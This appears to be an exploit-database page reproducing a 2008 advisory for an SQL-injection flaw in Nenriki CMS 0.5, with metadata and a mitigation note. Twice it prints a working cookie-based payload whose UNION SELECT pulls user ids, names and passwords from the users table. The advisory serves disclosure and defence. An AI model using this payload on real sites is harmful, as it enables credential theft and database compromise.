header-logo
Suggest Exploit
vendor:
Nenriki CMS
by:
SecurityFocus
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Nenriki CMS
Affected Version From: 0.5
Affected Version To: 0.5
Patch Exists: N/A
Related CWE: N/A
CPE: a:nenriki:nenriki_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Nenriki CMS SQL Injection Vulnerability

Nenriki CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. An attacker can exploit this issue by sending maliciously crafted SQL statements to the vulnerable application. The following example code is available: javascript:document.cookie ="password=1; path=/" then javascript:document.cookie ="ID=' union select 0,0,0,concat(id,name,char(58),password),0,0 from users--; path=/"

Mitigation:

Input validation should be used to prevent against SQL injection attacks. Additionally, the application should use stored procedures to access the database, and should not use dynamic SQL queries.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/34067/info

Nenriki CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Nenriki CMS 0.5 is vulnerable; other versions may also be affected. 

javascript:document.cookie ="password=1; path=/" then
javascript:document.cookie ="ID=' union select 0,0,0,concat(id,name,char(58),password),0,0 from users--; path=/"

Navigation

Suggest Exploit

Services By CQR